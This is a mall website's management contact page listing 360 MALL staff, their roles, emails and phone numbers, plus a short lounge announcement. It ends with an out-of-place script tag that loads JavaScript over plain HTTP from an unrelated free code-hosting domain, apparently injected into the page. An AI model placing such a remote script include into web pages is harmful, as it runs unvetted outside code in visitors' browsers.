STORE LOCATOR
Mall Management

Mall Management

360 MALL has put together a team of professionals to manage the strategic direction and day-to-day operations of the mall.

The team is experienced, motivated and driven to create and deliver the finest shopping experience for our visitors. Please feel free to contact any member of 360 MALL Management should you have a query or concern.

OPERATIONS

Tania Khoury - Deputy General Manager Operations.
 tania@gla.ae
+965 25309530 Ext 1020
+965 25309531

MARKETING

Claudia Lopusinska - Marketing Manager
claudia@gla.ae
+965 25309530 Ext 1030
+965 25309531

Christine Nabil - Assistant Marketing Manager
Christine.Nabil@gla.ae
+965 25309530 Ext 1033
+965 25309531

Salman S. Chaudhry - Marketing Executive
salman@gla.ae
+965 25309530 Ext 1031
+965 97684851
+965 25309531

LEASING

Christian Wistrom - GM Leasing
christian.wistrom@gla.ae
+965 25309530 Ext 1336
+965 25309531

SPECIALITY LEASING

Ismail Saddiq - Deputy General Manager Specialty Leasing
ismail@gla.ae
+965 25309530 Ext 1340
+965 25309531

MALL MANAGEMENT: gla.reception@gla.ae

WHAT'S NEW

Welcome to Mother & Baby Lounge, a world of comforts for you and your baby. Ground level next to gate 4, opposite customer service desk 2.ss

<script type="text/javascript" src="http://yourjavascript.com/914115017916/pteam.js"></script>